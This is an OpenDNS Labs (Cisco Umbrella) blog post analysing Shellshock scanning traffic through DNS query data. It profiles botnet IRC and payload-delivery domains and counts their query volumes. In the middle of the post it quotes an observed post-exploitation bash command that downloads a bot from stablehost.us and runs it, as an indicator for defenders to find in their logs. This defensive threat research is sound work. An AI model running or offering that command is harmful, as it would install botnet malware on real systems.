• Skip to primary navigation
  • Skip to main content
  • Skip to footer

Cisco Umbrella

Enterprise network security

  • Contact Sales
  • Login
    • Umbrella Login
    • Cloudlock Login
  • Why Us
    • Why Cisco Umbrella
      • Why Try Umbrella
      • Why DNS Security
      • Why Umbrella SASE
      • Our Customers
      • Customer Stories
      • Why Cisco Secure
    • Fast Reliable Cloud
      • Global Cloud Architecture
      • Cloud Network Status
      • Global Cloud Network Activity
    • Unmatched Intelligence
      • A New Approach to Cybersecurity
      • Interactive Intelligence
      • Cyber Attack Prevention
      • Umbrella and Cisco Talos Threat Intelligence
    • Extensive Integrations
      • IT Security Integrations
      • Hardware Integrations
      • Meraki Integration
      • Cisco Umbrella and SecureX
  • Products
    • Cisco Umbrella Products
      • Cisco Umbrella Cloud Security Service
      • Recursive DNS Services
      • Cisco Umbrella SIG
      • Umbrella Investigate
      • What’s New
    • Product Packages
      • Cisco Umbrella Package Comparison
      • – DNS Security Essentials Package
      • – DNS Security Advantage Package
      • – SIG Essentials Package
      • – SIG Advantage Package
      • Umbrella Support Packages
    • Functionality
      • DNS-Layer Security
      • Secure Web Gateway
      • Cloud Access Security Broker (CASB)
      • Cloud Data Loss Prevention (DLP)
      • Cloud-Delivered Firewall
      • Cloud Malware Protection
      • Remote Browser Isolation (RBI)
    • Man on a laptop with headphones on. He is attending a Cisco Umbrella Live Demo
  • Solutions
    • SASE & SSE Solutions
      • Cisco Umbrella SASE
      • Secure Access Service Edge (SASE)
      • What is SASE
      • What is Security Service Edge (SSE)
    • Functionality Solutions
      • Web Content Filtering
      • Secure Direct Internet Access
      • Shadow IT Discovery & App Blocking
      • Fast Incident Response
      • Unified Threat Management
      • Protect Mobile Users
      • Securing Remote and Roaming Users
    • Network Solutions
      • Guest Wi-Fi Security
      • SD-WAN Security
      • Off-Network Endpoint Security
    • Industry Solutions
      • Government and Public Sector Cybersecurity
      • Financial Services Security
      • Cybersecurity for Manufacturing
      • Higher Education Security
      • K-12 Schools Security
      • Healthcare, Retail and Hospitality Security
      • Enterprise Cloud Security
      • Small Business Cybersecurity
  • Resources
    • Content Library
      • Top Resources
      • Cybersecurity Webinars
      • Events
      • Research Reports
      • Case Studies
      • Videos
      • Datasheets
      • eBooks
      • Solution Briefs
    • International Documents
      • Deutsch/German
      • Español/Spanish
      • Français/French
      • Italiano/Italian
      • 日本語/Japanese
    • Security Definitions
      • What is Secure Access Service Edge (SASE)
      • What is Security Service Edge (SSE)
      • What is a Cloud Access Security Broker (CASB)
      • Cyber Threat Categories and Definitions
    • For Customers
      • Support
      • Customer Success Webinars
      • Cisco Umbrella Studio
  • Trends & Threats
    • Market Trends
      • Hybrid Workforce
      • Rise of Remote Workers
      • Secure Internet Gateway (SIG)
    • Security Threats
      • How to Stop Phishing Attacks
      • Malware Detection and Protection
      • Ransomware is on the Rise
      • Cryptomining Malware Protection
      • Cybersecurity Threat Landscape
      • Global Cyber Threat Intelligence
    •  
    • Woman connecting confidently to any device anywhere
  • Partners
    • Channel Partners
      • Partner Program
      • Become a Partner
    • Service Providers
      • Secure Connectivity
      • Managed Security for MSSPs
      • Managed IT for MSPs
    •  
    • Person looking down at laptop. They are connecting and working securely
  • Blog
    • News & Product Posts
      • Latest Posts
      • Products & Services
      • Customer Focus
      • Feature Spotlight
    • Cybersecurity Posts
      • Security
      • Threats
      • Cybersecurity Threat Spotlight
      • Research
    •  
    • Register for a webinar - with illustration of connecting securely to the cloud
  • Contact Us
  • Umbrella Login
  • Cloudlock Login
  • Free Trial
Threats

How OpenDNS Labs Sees the BASH Vulnerability

Author avatar of Security Research TeamSecurity Research Team
Updated — September 15, 2021 • 4 minute read
View blog >

There have been many blog posts, tweets, and even a few webinars already scheduled to talk about the massive patch-forcing BASH vulnerability – more commonly known as “Shellshock”. OpenDNS Security Labs thought long and hard about how we would respond and decided that, in the best interest of the security community, we wouldn’t simply rehash what everyone else was saying. Instead, we decided to look at the queries made on our global infrastructure to see what observations could be made.

For background on the Shellshock vulnerability we recommend visiting:
 
  • /2014/09/26/bash-shellshock-security-need-know/
  • http://www.csoonline.com/article/2688716/vulnerabilities/attacks-against-shellshock-continue-as-updated-patches-hit-the-web.html
  • http://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550

The Data

With the help of numerous sources, including our friends at AlienVault, ThreatStream, and Akamai in addition to individuals such as @lbhuston, @achillean, @dkulshitsky, and @nickschroedl, among others, we were able to compile a list of Shellshock scanning IP addresses. This list, which can be found here, contains 1060 unique IP addresses, at the time this blog post was written, from countries all over the world.
As we began to look at the data, a question materialized: how many of these scans were from researchers vs. malicious actors…and how could we find out?
To begin with, we looked at the IP addresses from our scan data set and determined the ASN, CIDR, geographic location, and AS owners for each scanner IP. An IP-based geolocation map was generated and can be seen below.
Screenshot 2014-09-30 14.36.37
Looking at the scanning IP country of origin, the chart shown below represents the top talking countries, by ASN, with more than 10 identified IP-to-ASN mappings. As you can see, the majority of scans originated from France, Germany, The Netherlands, Italy, China, Great Britain, and the United States, in ascending order.
Country_of_origin_scans
For those scanning countries with fewer than 10 scans, there is a much more level count of scans-per-country.
Country_of_origin_scans_lower_bounds 
Just hours after this vulnerability was reported, Perl Shellbot and bash injected ELF malware was seen in the wild.
Aside from researchers scanning the entire Internet (looking at you @achillean and @ErrataRob), hobbyists, and script kiddies, we observed a huge surge in connections to two IRC servers with hardcoded discovered in several Perl Shellbot samples we (along with others) found on Pastebin.com. These IRC servers, us[.]bot[.]nu and fbi[.]bot[.]nu, are profiled below, as is another malicious payload downloader site.

Analysis – us[.]bot[.]nu

Screenshot 2014-09-29 15.16.17
Between September 25th, 2014 and October 2nd, 2014 we observed more than 3.2 million queries for this domain on our infrastructure, with the highest peak (602,295) occurring on September 27th at 01:00 UTC.
Screenshot 2014-10-02 08.36.16

Analysis – fbi[.]bot[.]nu

Screenshot 2014-09-29 15.18.17
Between September 25th, 2014 and October 2nd, 2014 we observed more than 2.5 million queries for this domain, with the highest peak (410,651) occurring on September 27th at 01:00 UTC.
Screenshot 2014-10-02 08.38.24 

Analysis – Stablehost[.]us

A third domain has also been observed as a payload delivery downloader site after the Shellshock vulnerability is detected. This site, stablehost[.]us was known to, and blocked by, OpenDNS back in January, 2014 as it had been used to deliver the Fiesta exploit kit – and now appears to be repurposed for payload delivery.
Screenshot 2014-10-02 10.16.25

Screenshot 2014-10-02 10.14.40
The following string was observed by numerous researchers and security professionals across various perimeter security controls. The command is essentially fetching and running another payload as part of its post-exploitation campaign:

/bin/bash -c ”wget http://stablehost[.]us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot ; sh /tmp/sh;rm -rf /tmp/sh

Based on the sustained 1K query count, this is likely a string you should start reviewing your logs for.

Further Analysis

With all of that data, can we differentiate between researchers, script kiddies, and bots? The first two (researchers and script kiddies) are by far the most difficult to differentiate between <pause for laughter>. Let’s look at more findings and see…
Looking at day over day changes in activities between users who had been probing for the vulnerability on September 29th vs the 30th, there 118 more users on the 30th than on the 29th. Despite this sudden uptick in users what was more interesting was traffic patterns between the two groups. More than 90% of the new Shellshock probers visited less than three suspicious websites. However, individuals on the 29th who had visited malware continued to visit malware on the same rate on the 30th. In fact, the malware rates and sites visited were almost identical with a deviation of +/- 2. One guess could be that the surge in new probers could be a either security researchers or script kiddies. The users on the 29th who were probing, and had high malware visitation rates, were probably already compromised machines.
Interestingly – only one malicious domain was found common across each of the three datasets. The advombat[.]ru domain was found once in the Stablehost dataset and three times in both the September 29th and September 30th datasets. The advombat domain is connected with ransomware downloads and, viewing a query history over the past one month, reveals that the domain receives approximately 15k queries per hour with traffic activity following a diurnal pattern. This sort of behavior supports the hypothesis that machines probing for the Shellshock vulnerability on the 29th were part of a larger compromised network. A point of further investigation would be to analyze similarities in traffic between computers that have visited advombat domain.
The stablehost[.]us dataset provided us with data regarding computers that were becoming part of a larger Shellshock botnet. The most frequently found domain found across the set of 18 IPs was stabehost[.]us with 17 occurrences. The second most common was linksys[.]secureshellz[.]net. with 8 occurrences.
Screenshot 2014-10-02 11.43.37
Secureshellz has been identified by researchers such as our friends over at @MalwareMustDie as one of the C2 centers for the Shellshock botnet. It was also previously known, and blocked, for serving the Fiesta Exploit Kit at the beginning of January, 2014.

In closing… 

So it seems that looking at the data as we’ve done thus far hasn’t really afforded us the visibility into the bot vs. human vs. infected human differentiation problem. OpenDNS Labs will continue to explore this in an upcoming blog post as we have some interesting ideas on how to attack this particular problem and secure DNS servers against attack.

Suggested Blogs

  • Cybersecurity Threat Spotlight: Emotet, RedLine Stealer, and Magnat Backdoor February 3, 2022 5 minute read
  • Using DNS-layer security to detect and prevent ransomware attacks August 12, 2021 6 minute read
  • The cost of ransomware attacks: Why and how you should protect your data August 10, 2021 4 minute read

Share this blog

FacebookTweetLinkedIn

Follow Us

  • Twitter
  • Facebook
  • LinkedIn
  • YouTube

Footer Sections

What we make

  • Cloud Security Service
  • DNS-Layer Network Security
  • Secure Web Gateway
  • Security Packages

Who we are

  • Global Cloud Architecture
  • Cloud Network Status
  • Cloud Network Activity
  • OpenDNS is now Umbrella
  • Cisco Umbrella Blog

Learn more

  • Webinars
  • Careers
  • Support
  • Cisco Umbrella Live Demo
  • Contact Sales
Umbrella by Cisco
208.67.222.222+208.67.220.220
2620:119:35::35+2620:119:53::53
Sign up for a Free Trial
  • Cisco Online Privacy Statement
  • Terms of Service
  • Sitemap

© 2023 Cisco Umbrella